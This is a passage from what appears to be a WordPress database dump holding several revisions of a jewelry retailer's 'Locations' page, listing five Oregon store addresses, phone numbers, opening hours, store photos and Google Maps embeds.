href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption][/span4]\r\n[span4][caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"wp-image-86 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption][/span4]\r\n[span4]map[/span4]\r\n\r\n\r\n\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2.jpg\"><img class=\"alignnone wp-image-84 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2-300x192.jpg\" alt=\"\" width=\"300\" height=\"192\" /></a>\r\n\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168\r\n</strong>\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone wp-image-89 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"\" width=\"300\" height=\"241\" /></a>\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-26 09:29:19','2015-02-26 17:29:19','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(138,1,'2015-02-26 09:33:45','2015-02-26 17:33:45','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n[span4]\r\n[caption id=\"attachment_87\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2.jpg\"><img class=\"wp-image-87 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_outside-2-300x215.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"215\" /></a> 2932 N. Lombard[/caption]\r\n[/span4]\r\n[span4]\r\n[caption id=\"attachment_86\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2.jpg\"><img class=\"wp-image-86 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard_inside-2-300x173.jpg\" alt=\"2932 N. Lombard\" width=\"300\" height=\"173\" /></a> 2932 N. Lombard[/caption]\r\n[/span4]\r\n[span4]\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2792.6752415075734!2d-122.6973386!3d45.576969!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a7bc5175458b%3A0x6a338a6c83521185!2s2932+N+Lombard+St%2C+Portland%2C+OR+97217!5e0!3m2!1sen!2sus!4v1424971890870\" width=\"400\" height=\"300\" frameborder=\"0\" style=\"border:0\"></iframe>\r\n[/span4]\r\n\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n[span4]\r\n[caption id=\"attachment_85\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2.jpg\"><img class=\"wp-image-85 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_outside-2-300x221.jpg\" alt=\"Division_outside-2\" width=\"300\" height=\"221\" /></a> 12200 SE Division[/caption]\r\n[/span4]\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2.jpg\"><img class=\"alignnone wp-image-84 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division_inside-2-300x192.jpg\" alt=\"\" width=\"300\" height=\"192\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2796.308567804789!2d-122.53730759999999!3d45.503866699999996!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a1c202f16d99%3A0xd11d950ef929fd57!2s12200+SE+Division+St%2C+Portland%2C+OR+97236!5e0!3m2!1sen!2sus!4v1424972011050\" width=\"400\" height=\"300\" frameborder=\"0\" style=\"border:0\"></iframe>\r\n[/span4]\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168\r\n</strong>\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside.jpg\"><img class=\"alignnone wp-image-89 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside-300x241.jpg\" alt=\"\" width=\"300\" height=\"241\" /></a>\r\n\r\n[caption id=\"attachment_88\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside.jpg\"><img class=\"wp-image-88 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside-300x200.jpg\" alt=\"Milwaukie_inside\" width=\"300\" height=\"200\" /></a> 15114 SE McLoughlin[/caption]\r\n\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[caption id=\"attachment_92\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2.jpg\"><img class=\"wp-image-92 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Inside_-2-300x177.jpg\" alt=\"Tigard_Inside_-2\" width=\"300\" height=\"177\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]','Locations','','inherit','open','open','','83-revision-v1','','','2015-02-26 09:33:45','2015-02-26 17:33:45','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(170,1,'2015-03-09 13:56:50','2015-03-09 20:56:50','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside.jpg\"><img class=\"alignnone wp-image-154 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside-300x215.jpg\" alt=\"Lombard, All that Glitters\" width=\"300\" height=\"215\" /></a>\r\n\r\n[/span4]\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside.jpg\"><img class=\"alignnone wp-image-155 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside-300x215.jpg\" alt=\"Lombard, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2792.6752415075734!2d-122.6973386!3d45.576969!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a7bc5175458b%3A0x6a338a6c83521185!2s2932+N+Lombard+St%2C+Portland%2C+OR+97217!5e0!3m2!1sen!2sus!4v1424971890870\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside.jpg\"><img class=\"alignnone wp-image-157 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside-300x221.jpg\" alt=\"Division, all that glitters\" width=\"300\" height=\"221\" /></a>[/span4]\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside.jpg\"><img class=\"alignnone wp-image-158 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside-300x215.jpg\" alt=\"Division inside, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2796.308567804789!2d-122.53730759999999!3d45.503866699999996!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a1c202f16d99%3A0xd11d950ef929fd57!2s12200+SE+Division+St%2C+Portland%2C+OR+97236!5e0!3m2!1sen!2sus!4v1424972011050\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168</strong>\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1.jpg\"><img class=\"alignnone size-medium wp-image-162\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1.jpg\"><img class=\"alignnone size-medium wp-image-163\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.7774589673077!2d-122.62954599999999!3d45.413827!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495745ed4b97ea3%3A0x718f1732179ebc6e!2s15114+SE+McLoughlin+Blvd%2C+Portland%2C+OR+97267!5e0!3m2!1sen!2sus!4v1424972438719\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside.jpg\"><img class=\"alignnone size-medium wp-image-165\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside-300x215.jpg\" alt=\"Tigard, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-inside.jpg\"><img class=\"alignnone size-medium wp-image-166\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-inside-300x215.jpg\" alt=\"Tigard, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.122881897304!2d-122.7771537!3d45.427024200000005!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950d2478b9878b%3A0x8606ae6c36002c06!2s12760+SW+Pacific+Hwy%2C+Tigard%2C+OR+97223!5e0!3m2!1sen!2sus!4v1424972494023\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-outside.jpg\"><img class=\"alignnone size-medium wp-image-169\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-outside-300x215.jpg\" alt=\"Salem, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-inside.jpg\"><img class=\"alignnone size-medium wp-image-168\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem-inside-300x215.jpg\" alt=\"Salem, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2823.9331948345302!2d-122.98391!3d44.945026!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54bffec2370440b3%3A0x851994b509c59f4b!2s1191+Lancaster+Dr+NE%2C+Salem%2C+OR+97301!5e0!3m2!1sen!2sus!4v1424972552736\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]','Locations','','inherit','open','open','','83-revision-v1','','','2015-03-09 13:56:50','2015-03-09 20:56:50','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(167,1,'2015-03-09 13:53:18','2015-03-09 20:53:18','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside.jpg\"><img class=\"alignnone wp-image-154 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside-300x215.jpg\" alt=\"Lombard, All that Glitters\" width=\"300\" height=\"215\" /></a>\r\n\r\n[/span4]\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside.jpg\"><img class=\"alignnone wp-image-155 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside-300x215.jpg\" alt=\"Lombard, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2792.6752415075734!2d-122.6973386!3d45.576969!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a7bc5175458b%3A0x6a338a6c83521185!2s2932+N+Lombard+St%2C+Portland%2C+OR+97217!5e0!3m2!1sen!2sus!4v1424971890870\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside.jpg\"><img class=\"alignnone wp-image-157 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside-300x221.jpg\" alt=\"Division, all that glitters\" width=\"300\" height=\"221\" /></a>[/span4]\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside.jpg\"><img class=\"alignnone wp-image-158 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside-300x215.jpg\" alt=\"Division inside, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2796.308567804789!2d-122.53730759999999!3d45.503866699999996!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a1c202f16d99%3A0xd11d950ef929fd57!2s12200+SE+Division+St%2C+Portland%2C+OR+97236!5e0!3m2!1sen!2sus!4v1424972011050\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168</strong>\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1.jpg\"><img class=\"alignnone size-medium wp-image-162\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1.jpg\"><img class=\"alignnone size-medium wp-image-163\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.7774589673077!2d-122.62954599999999!3d45.413827!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495745ed4b97ea3%3A0x718f1732179ebc6e!2s15114+SE+McLoughlin+Blvd%2C+Portland%2C+OR+97267!5e0!3m2!1sen!2sus!4v1424972438719\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside.jpg\"><img class=\"alignnone size-medium wp-image-165\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-outside-300x215.jpg\" alt=\"Tigard, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-inside.jpg\"><img class=\"alignnone size-medium wp-image-166\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard-inside-300x215.jpg\" alt=\"Tigard, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.122881897304!2d-122.7771537!3d45.427024200000005!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54950d2478b9878b%3A0x8606ae6c36002c06!2s12760+SW+Pacific+Hwy%2C+Tigard%2C+OR+97223!5e0!3m2!1sen!2sus!4v1424972494023\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>SALEM, OR: 1191 Lancaster Dr. NE 503-362-9939</strong>\r\n[span4]\r\n\r\n[caption id=\"attachment_91\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2.jpg\"><img class=\"wp-image-91 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_Outside-2-300x131.jpg\" alt=\"Salem_Outside-2\" width=\"300\" height=\"131\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n\r\n[caption id=\"attachment_90\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2.jpg\"><img class=\"wp-image-90 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Salem_inside-2-300x155.jpg\" alt=\"Salem_inside-2\" width=\"300\" height=\"155\" /></a> 1191 Lancaster Dr. NE[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2823.9331948345302!2d-122.98391!3d44.945026!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x54bffec2370440b3%3A0x851994b509c59f4b!2s1191+Lancaster+Dr+NE%2C+Salem%2C+OR+97301!5e0!3m2!1sen!2sus!4v1424972552736\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]','Locations','','inherit','open','open','','83-revision-v1','','','2015-03-09 13:53:18','2015-03-09 20:53:18','',83,'http://atgjewelry.com/fuze7/83-revision-v1/',0,'revision','',0),(164,1,'2015-03-09 13:48:33','2015-03-09 20:48:33','<h1 style=\"text-align: center;\"><strong>5 Oregon Locations, Open 7 Days a Week!</strong></h1>\r\n<h4 style=\"text-align: center;\"><strong>Monday - Saturday: 10:00 AM - 7:00 PM</strong></h4>\r\n<h4 style=\"text-align: center;\"><strong>Sunday: 11:00 AM - 5:00 PM</strong></h4>\r\n<strong>PORTLAND, OR: 2932 N. Lombard 503-247-1019</strong>\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside.jpg\"><img class=\"alignnone wp-image-154 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-outside-300x215.jpg\" alt=\"Lombard, All that Glitters\" width=\"300\" height=\"215\" /></a>\r\n\r\n[/span4]\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside.jpg\"><img class=\"alignnone wp-image-155 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Lombard-inside-300x215.jpg\" alt=\"Lombard, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2792.6752415075734!2d-122.6973386!3d45.576969!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a7bc5175458b%3A0x6a338a6c83521185!2s2932+N+Lombard+St%2C+Portland%2C+OR+97217!5e0!3m2!1sen!2sus!4v1424971890870\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>PORTLAND, OR: 12200 SE Division 503-761-9699</strong>\r\n[span4]\r\n\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside.jpg\"><img class=\"alignnone wp-image-157 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-outside-300x221.jpg\" alt=\"Division, all that glitters\" width=\"300\" height=\"221\" /></a>[/span4]\r\n[span4]\r\n<a class=\"thickbox\" href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside.jpg\"><img class=\"alignnone wp-image-158 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Division-inside-300x215.jpg\" alt=\"Division inside, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2796.308567804789!2d-122.53730759999999!3d45.503866699999996!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495a1c202f16d99%3A0xd11d950ef929fd57!2s12200+SE+Division+St%2C+Portland%2C+OR+97236!5e0!3m2!1sen!2sus!4v1424972011050\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>MILWAUKIE, OR: 15114 SE McLoughlin 503-785-1168</strong>\r\n[span4]\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1.jpg\"><img class=\"alignnone size-medium wp-image-162\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_outside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>\r\n[/span4]\r\n[span4]\r\n\r\n<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1.jpg\"><img class=\"alignnone size-medium wp-image-163\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Milwaukie_inside1-300x215.jpg\" alt=\"Milwaukie, all that glitters\" width=\"300\" height=\"215\" /></a>[/span4]\r\n[span4]\r\n<iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d2800.7774589673077!2d-122.62954599999999!3d45.413827!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x5495745ed4b97ea3%3A0x718f1732179ebc6e!2s15114+SE+McLoughlin+Blvd%2C+Portland%2C+OR+97267!5e0!3m2!1sen!2sus!4v1424972438719\" width=\"400\" height=\"300\" frameborder=\"0\"></iframe>\r\n[/span4]\r\n<strong>TIGARD, OR: 12760 SW Pacific Hwy 503-761-9699</strong>\r\n[span4]\r\n\r\n[caption id=\"attachment_93\" align=\"alignnone\" width=\"300\"]<a href=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2.jpg\"><img class=\"wp-image-93 size-medium\" src=\"http://atgjewelry.com/fuze7/wp-content/uploads/2015/02/Tigard_Site_Outside-2-300x199.jpg\" alt=\"Tigard_Site_Outside-2\" width=\"300\" height=\"199\" /></a> 12760 SW Pacific Hwy[/caption]\r\n\r\n[/span4]\r\n[span4]\r\n\r\n[caption id=\"attachment_92\" 